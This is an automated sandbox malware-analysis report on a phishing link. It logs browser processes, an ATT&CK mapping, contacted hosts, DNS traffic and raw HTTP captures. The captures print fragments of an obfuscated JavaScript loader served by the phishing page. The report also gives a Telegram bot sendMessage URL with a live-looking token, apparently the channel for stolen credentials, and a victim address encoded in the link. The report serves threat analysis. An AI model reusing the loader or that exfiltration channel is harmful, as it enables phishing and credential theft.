Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,12922102568577335024,13240247092001205666,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2160 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,12922102568577335024,13240247092001205666,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4680 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label	Link
https://magnificent-absorbed-ravioli.glitch.me/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
kit.fontawesome.com.cdn.cloudflare.net	172.64.147.188	true	false	high
financesonline.com	192.124.249.111	true	false	high
d26p066pn2w0s0.cloudfront.net	13.32.27.14	true	false	unknown
glitch-custom-domains.map.fastly.net	151.101.2.59	true	false	high
ipinfo.io	34.117.59.81	true	false	high
maxcdn.bootstrapcdn.com	104.18.11.207	true	false	high
www.google.com	142.250.185.68	true	false	high
api.telegram.org	149.154.167.220	true	false	high
www.hashmicro.com	172.67.68.34	true	false	unknown
ln.run	104.21.112.1	true	false	high
d1771yyru3k4x.cloudfront.net	18.172.112.21	true	false	unknown
dns.google	8.8.4.4	true	false	high
magnificent-absorbed-ravioli.glitch.me	unknown	unknown	true	unknown
kit.fontawesome.com	unknown	unknown	false	high
resource.ecount.com	unknown	unknown	true	unknown
logo.clearbit.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://magnificent-absorbed-ravioli.glitch.me/	true	Avira URL Cloud: safe	unknown
https://magnificent-absorbed-ravioli.glitch.me/#eWVjMDExNEBrb3JlYS5rcg==	true		unknown
https://financesonline.com/uploads/2020/06/ECount-logo1-220x90.png	false		high
https://api.telegram.org/bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage	false		high
https://dns.google/resolve?name=korea.kr&type=MX	false		high
https://ipinfo.io/json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/missingauth	chromecache_93.2.dr, chromecache_96.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.64.147.188	kit.fontawesome.com.cdn.cloudflare.net	United States	13335	CLOUDFLARENETUS	false
8.8.4.4	dns.google	United States	15169	GOOGLEUS	false
13.32.27.14	d26p066pn2w0s0.cloudfront.net	United States	7018	ATT-INTERNET4US	false
172.67.68.34	www.hashmicro.com	United States	13335	CLOUDFLARENETUS	false
8.8.8.8	unknown	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.112.1	ln.run	United States	13335	CLOUDFLARENETUS	false
104.26.7.183	unknown	United States	13335	CLOUDFLARENETUS	false
18.172.112.114	unknown	United States	3	MIT-GATEWAYSUS	false
142.250.185.68	www.google.com	United States	15169	GOOGLEUS	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
151.101.2.59	glitch-custom-domains.map.fastly.net	United States	54113	FASTLYUS	false
18.172.112.21	d1771yyru3k4x.cloudfront.net	United States	3	MIT-GATEWAYSUS	false
104.18.11.207	maxcdn.bootstrapcdn.com	United States	13335	CLOUDFLARENETUS	false
192.124.249.111	financesonline.com	United States	30148	SUCURI-SECUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1636826
Start date and time:	2025-03-13 07:33:46 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.phis.troj.win@24/31@39/16

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.181.238, 74.125.71.84, 172.217.18.14, 142.250.184.227, 142.250.185.142, 172.217.16.206, 216.58.206.46, 142.250.186.74, 142.250.186.170, 142.250.185.67, 142.250.184.202, 216.58.206.74, 216.58.206.42, 142.250.181.234, 142.250.184.234, 172.217.16.202, 172.217.16.138, 216.58.212.170, 172.217.18.10, 142.250.186.138, 142.250.185.138, 142.250.185.202, 142.250.185.106, 142.250.185.170, 142.250.185.174, 142.250.186.142, 172.217.16.195, 172.217.18.110, 216.58.212.131, 142.251.40.174, 173.194.17.198, 142.250.186.110, 142.250.80.78, 172.202.163.200, 150.171.28.10, 2.23.227.215
Excluded domains from analysis (whitelisted): www.bing.com, r1.sn-hp57knd6.gvt1.com, fonts.googleapis.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ajax.googleapis.com, fonts.gstatic.com, r1---sn-hp57knd6.gvt1.com, clientservices.googleapis.com, g.bing.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.519265602280304
Encrypted:	false
SSDEEP:	3:YKOHcWnyKBAHfXHyUNskUQ9WeUAdRNn:YKOHnyaiftOkUgzTN
MD5:	3FA187421B5A45709B21C348556B4A6A
SHA1:	F44809B9AAA680AE2BD9952DEEE31F85FED9FFB1
SHA-256:	BADDE82FD2CA7C7B153EC29AAABD4E9A370A953FF2C0591DFB19B4521D4AE518
SHA-512:	7C738A42C954A55E718266CA0868870E6F87E9676298E1A488F14DFC546FC5E69EAA3069CA452C9AA6DAA2B7EC431FF51A82566A2EDD177C1180E9631802A6C2
Malicious:	false
Reputation:	low
Preview:	{"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 07:34:54.054783106 CET	53	49966	1.1.1.1	192.168.2.5
Mar 13, 2025 07:34:54.068680048 CET	53	53637	1.1.1.1	192.168.2.5
Mar 13, 2025 07:34:57.866394043 CET	53	59826	1.1.1.1	192.168.2.5
Mar 13, 2025 07:34:58.086241007 CET	53	49366	1.1.1.1	192.168.2.5
Mar 13, 2025 07:34:58.381673098 CET	63332	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:34:58.381913900 CET	54432	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:34:58.388505936 CET	53	63332	1.1.1.1	192.168.2.5
Mar 13, 2025 07:34:58.388628960 CET	53	54432	1.1.1.1	192.168.2.5
Mar 13, 2025 07:34:59.938052893 CET	53487	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:34:59.939379930 CET	62938	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:34:59.947958946 CET	53	53487	1.1.1.1	192.168.2.5
Mar 13, 2025 07:34:59.951154947 CET	53	62938	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:04.906213045 CET	59914	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:04.906579018 CET	54557	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:04.926263094 CET	53	59914	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:04.953917980 CET	53	54557	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:08.584656954 CET	59986	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:08.584861040 CET	59957	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:08.586194038 CET	59807	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:08.586390018 CET	52631	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:08.591517925 CET	53	59986	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:08.591979980 CET	53	59957	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:08.592936993 CET	53	52631	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:08.593161106 CET	53	56158	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:08.593560934 CET	53	59807	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:08.593741894 CET	53	54752	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:12.960045099 CET	55192	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:12.960268021 CET	60951	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:12.970778942 CET	53	60951	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:12.971024990 CET	53	55192	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:13.509640932 CET	56801	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:13.509967089 CET	60043	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:13.522357941 CET	53	56801	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:13.545348883 CET	53	60043	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:13.632338047 CET	61012	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:13.633101940 CET	51830	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:13.640916109 CET	53	55329	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:13.650181055 CET	53	51830	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:13.658448935 CET	53	61012	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:15.014307022 CET	53	52548	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:15.659754992 CET	56342	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:15.660037994 CET	56382	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:15.679430962 CET	53	56382	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:15.680444956 CET	53	56342	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:18.491728067 CET	53978	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:18.491728067 CET	56432	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:18.492330074 CET	63926	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:18.492672920 CET	64174	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:18.501662970 CET	53	63926	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:18.514457941 CET	53	64174	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:18.762108088 CET	53	56432	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:19.057815075 CET	61045	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:19.058027029 CET	63553	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:19.065470934 CET	53	61045	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:19.088423967 CET	53	63553	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:19.508586884 CET	58564	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:19.618905067 CET	53	53978	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:19.784387112 CET	53	58564	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:25.199111938 CET	57739	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:25.199461937 CET	52500	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:25.483913898 CET	53	57739	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:25.522350073 CET	53	52500	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:34.236223936 CET	53	59154	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:40.255172968 CET	56839	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:40.255311966 CET	61103	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:40.262528896 CET	53	56839	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:40.263647079 CET	53	61103	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:42.478873968 CET	138	138	192.168.2.5	192.168.2.255
Mar 13, 2025 07:35:42.874362946 CET	52145	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:42.874752998 CET	56790	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:42.876389980 CET	59128	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:42.876543045 CET	59054	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:42.881160021 CET	53	52145	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:42.881602049 CET	53	56790	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:42.882869959 CET	53	59128	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:42.883847952 CET	53	59054	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:45.431178093 CET	56818	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:45.431355953 CET	61944	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:45.435610056 CET	54336	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:45.435786009 CET	61270	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:45.437956095 CET	53	56818	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:45.442210913 CET	53	54336	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:45.442256927 CET	53	61270	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:45.449583054 CET	53	61944	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:48.743396997 CET	55982	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:48.743583918 CET	51700	53	192.168.2.5	1.1.1.1
Mar 13, 2025 07:35:48.749984980 CET	53	55982	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:48.762950897 CET	53	51700	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:53.853508949 CET	53	62348	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:56.748547077 CET	53	59034	1.1.1.1	192.168.2.5
Mar 13, 2025 07:35:59.185800076 CET	53	56817	1.1.1.1	192.168.2.5
Mar 13, 2025 07:36:00.794506073 CET	53	65461	1.1.1.1	192.168.2.5
Mar 13, 2025 07:36:14.765724897 CET	53	51955	1.1.1.1	192.168.2.5

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 13, 2025 07:35:04.954010010 CET	192.168.2.5	1.1.1.1	c26c	(Port unreachable)	Destination Unreachable
Mar 13, 2025 07:35:13.545603991 CET	192.168.2.5	1.1.1.1	c242	(Port unreachable)	Destination Unreachable
Mar 13, 2025 07:35:19.784504890 CET	192.168.2.5	1.1.1.1	c254	(Port unreachable)	Destination Unreachable
Mar 13, 2025 07:35:45.449671030 CET	192.168.2.5	1.1.1.1	c236	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2025-03-13 06:35:07 UTC	688	OUT	GET / HTTP/1.1 Host: magnificent-absorbed-ravioli.glitch.me Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 06:35:08 UTC	705	IN	HTTP/1.1 200 OK Connection: close Content-Length: 236458 accept-ranges: bytes last-modified: Wed, 12 Mar 2025 02:32:02 GMT x-amz-id-2: xV+leQSn8lalyWHJ0bZTnS7brq82LgdYK0QPcODbS7b2IiOTcqg9uG3lhUvRI2j2eU2fthkYixWMh/jflb+ImTN2SyE4TGr0nKUHCgIDbug= cache-control: no-cache x-amz-server-side-encryption: AES256 server: AmazonS3 x-amz-request-id: 5Q7S6PMCK96P8SJF etag: "6004bccfded18770c30ef988aa7cb5e9" x-amz-version-id: xrBhdiYFtgxcK0ApSWW72p497LL.kAL7 content-type: text/html; charset=utf-8 Date: Thu, 13 Mar 2025 06:35:07 GMT Via: 1.1 varnish X-Served-By: cache-dfw-kdfw8210024-DFW, cache-dfw-kdfw8210024-DFW X-Cache: MISS, MISS X-Cache-Hits: 0, 0 X-Timer: S1741847707.471047,VS0,VE436
2025-03-13 06:35:08 UTC	1378	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 20 20 46 75 6e 63 74 69 6f 6e 28 0a 20 20 20 20 27 5c 27 35 7d 5f 71 63 63 6e 37 69 5e 7e 38 70 37 36 65 7d 2a 65 21 74 2a 72 2d 31 2a 23 70 5e 2e 38 5d 6c 70 74 72 65 25 37 32 7a 26 76 6b 72 66 7e 76 5e 6f 7b 65 71 67 73 78 6f 6e 78 5f 40 25 5d 61 61 40 31 70 6c 5b 6b 76 6d 2e 2a 23 34 79 34 32 5f 73 5d 75 73 6e 6a 26 7d 66 32 40 21 37 23 74 7d 67 65 61 35 61 25 69 37 2d 7a 2e 33 2b 40 6e 35 66 5d 66 71 6b 72 7d 6e 7d 5e 7e 7a 68 68 2c 72 75 68 38 2d 36 40 5b 70 2e 2a 31 39 65 36 77 61 38 68 75 7d 33 6d 5b 5e 6f 76 7e 6e 2c 2c 76 34 2d 34 67 63 6f 69 21 78 67 26 5e 68 31 7a 26 69 65 61 39 21 66 7b 71 26 78 2b 5b 78 26 21 74 2e 73 39 77 5d 77 68 39 76 74 35 2d 6f 5f 65 21 2b 39 35 6e 5f 32 61 5b 25 73 26 78 63 6c 67 34 2c 5d 76 Data Ascii: <script> Function( '\'5}_qccn7i^~8p76e}e!tr-1#p^.8]lptre%72z&vkrf~v^o{eqgsxonx_@%]aa@1pl[kvm.#4y42_s]usnj&}f2@!7#t}gea5a%i7-z.3+@n5f]fqkr}n}^~zhh,ruh8-6@[p.*19e6wa8hu}3m[^ov~n,,v4-4gcoi!xg&^h1z&iea9!f{q&x+[x&!t.s9w]wh9vt5-o_e!+95n_2a[%s&xclg4,]v
2025-03-13 06:35:08 UTC	1378	IN	Data Raw: 52 34 31 29 7b 5f 43 53 67 57 32 68 34 30 38 4a 45 38 72 73 78 39 68 34 78 5a 32 71 51 36 41 63 77 74 30 53 6d 73 53 37 49 56 7a 42 32 43 37 31 4c 6b 4d 4c 6e 4d 3d 74 68 69 73 3b 5f 51 54 57 37 76 30 37 45 37 4f 38 38 71 39 68 33 34 6c 62 38 73 39 39 35 47 6b 79 70 31 71 55 6b 30 63 31 42 33 65 37 35 42 7a 3d 5c 5c 22 5c 5c 5c 5c 31 36 32 5c 5c 5c 5c 31 34 35 5c 5c 5c 5c 31 36 30 5c 5c 5c 5c 31 35 34 5c 5c 5c 5c 31 34 31 5c 5c 5c 5c 31 34 33 5c 5c 5c 5c 31 34 35 5c 5c 22 3b 5f 24 3d 7b 7d 3b 5c 5c 22 5f 42 6d 76 59 32 35 43 58 39 63 37 4d 78 4b 39 36 72 4b 51 68 30 50 35 49 37 35 4c 43 6e 35 32 61 4a 72 50 5a 32 33 6f 32 76 6d 68 76 70 50 53 42 6d e2 80 8e 41 45 77 70 73 68 72 31 46 65 31 34 76 36 33 65 52 4b 43 6e 4e 74 33 46 44 51 65 33 5a 66 57 37 61 Data Ascii: R41){_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM=this;_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz=\\"\\\\162\\\\145\\\\160\\\\154\\\\141\\\\143\\\\145\\";_$={};\\"_BmvY25CX9c7MxK96rKQh0P5I75LCn52aJrPZ23o2vmhvpPSBmAEwpshr1Fe14v63eRKCnNt3FDQe3ZfW7a
2025-03-13 06:35:08 UTC	1378	IN	Data Raw: 37 31 4c 6b 4d 4c 6e 4d 5b 5c 5c 22 51 52 6c 61 65 57 6b 39 67 77 45 6f 32 7a 78 66 79 33 70 48 75 5c 5c 22 5b 5f 51 54 57 37 76 30 37 45 37 4f 38 38 71 39 68 33 34 6c 62 38 73 39 39 35 47 6b 79 70 31 71 55 6b 30 63 31 42 33 65 37 35 42 7a 5d 28 2f 5b 39 75 6c 6b 57 48 32 77 61 51 66 33 6f 7a 79 5d 2f 67 2c 5c 5c 22 5c 5c 22 29 5d 28 5c 5c 22 5b 5c 5c 22 2b 5f 56 37 37 75 30 57 39 35 63 68 4e 32 73 36 43 32 56 55 4a 38 34 43 57 39 53 5b 31 5d 2b 5c 5c 22 5d 5c 5c 22 2c 5c 5c 22 67 5c 5c 22 29 2c 5c 5c 22 5c 5c 22 29 3b 7d 29 3b 5f 4c 43 35 77 34 7a 71 35 38 46 31 52 34 67 47 6a 37 76 79 4b 6d 38 67 37 34 45 42 6d 77 73 3d 28 5f 4a 36 79 52 35 31 31 5a 33 44 59 42 66 42 52 34 31 29 3d 3e 7b 5f 4a 36 79 52 35 31 31 5a 33 44 59 42 66 42 52 34 31 5b 5f 24 2e Data Ascii: 71LkMLnM[\\"QRlaeWk9gwEo2zxfy3pHu\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[9ulkWH2waQf3ozy]/g,\\"\\")](\\"[\\"+_V77u0W95chN2s6C2VUJ84CW9S[1]+\\"]\\",\\"g\\"),\\"\\");});_LC5w4zq58F1R4gGj7vyKm8g74EBmws=(_J6yR511Z3DYBfBR41)=>{_J6yR511Z3DYBfBR41[_$.
2025-03-13 06:35:08 UTC	1378	IN	Data Raw: 37 37 63 63 31 32 37 38 63 32 31 41 37 59 39 32 31 58 38 31 44 36 65 66 37 39 64 64 33 34 39 30 58 36 33 58 39 33 64 39 33 46 35 35 62 31 5b 32 35 59 62 30 21 39 35 46 58 41 35 31 41 38 62 62 34 35 61 39 7d 30 35 63 62 32 48 61 35 46 61 35 2e 62 32 30 62 36 49 39 36 35 37 63 29 38 36 66 43 36 43 43 32 31 63 31 31 44 37 61 63 32 31 59 37 44 43 59 32 44 38 39 41 34 58 30 38 38 64 34 32 34 34 64 41 39 66 63 34 43 59 44 33 59 35 39 61 65 56 61 35 44 46 38 34 38 37 66 62 36 33 64 61 32 58 31 33 39 37 39 59 41 31 36 37 32 63 63 33 44 39 61 65 39 36 38 39 37 52 35 32 62 59 32 31 63 32 58 39 61 46 46 37 35 61 61 46 59 36 43 38 62 46 37 33 62 39 36 58 41 36 36 44 32 2e 32 37 36 59 34 32 44 36 62 62 30 33 44 38 36 62 62 33 32 36 38 62 61 32 37 35 36 65 32 31 36 39 Data Ascii: 77cc1278c21A7Y921X81D6ef79dd3490X63X93d93F55b1[25Yb0!95FXA51A8bb45a9}05cb2Ha5Fa5.b20b6I9657c)86fC6CC21c11D7ac21Y7DCY2D89A4X088d4244dA9fc4CYD3Y59aeVa5DF8487fb63da2X13979YA1672cc3D9ae96897R52bY21c2X9aFF75aaFY6C8bF73b96XA66D2.276Y42D6bb03D86bb3268ba2756e2169
2025-03-13 06:35:08 UTC	1378	IN	Data Raw: 38 44 65 36 34 36 61 33 65 62 34 66 35 34 4d 36 65 63 35 39 62 30 26 37 35 58 59 35 29 63 36 33 59 41 35 39 61 64 7b 38 35 64 62 35 31 38 33 35 37 32 44 41 33 30 38 37 32 34 36 44 39 37 59 44 32 61 38 31 64 38 32 66 38 36 64 64 39 31 37 35 63 63 33 39 39 30 58 37 33 65 39 35 58 43 35 31 64 63 33 38 35 35 46 32 33 58 39 36 66 32 34 30 35 32 47 34 58 41 35 37 41 58 3d 35 35 43 59 33 26 61 36 31 59 38 35 31 41 37 53 30 35 66 62 32 31 34 36 38 63 35 31 35 36 32 38 66 63 63 32 36 63 30 31 37 36 58 39 61 63 30 32 44 38 34 64 62 33 32 38 39 58 30 39 34 37 38 43 46 33 43 39 33 58 41 34 31 39 38 58 46 35 34 46 31 33 39 61 33 46 36 7c 36 41 37 58 43 66 65 62 30 39 36 2a 33 35 61 62 31 7b 38 35 66 62 36 2a 64 36 34 66 65 36 31 59 35 5f 66 36 39 38 38 63 35 31 46 38 Data Ascii: 8De646a3eb4f54M6ec59b0&75XY5)c63YA59ad{85db5183572DA3087246D97YD2a81d82f86dd9175cc3990X73e95XC51dc3855F23X96f24052G4XA57AX=55CY3&a61Y851A7S05fb21468c515628fcc26c0176X9ac02D84db3289X09478CF3C93XA4198XF54F139a3F6\|6A7XCfeb09635ab1{85fb6d64fe61Y5_f6988c51F8
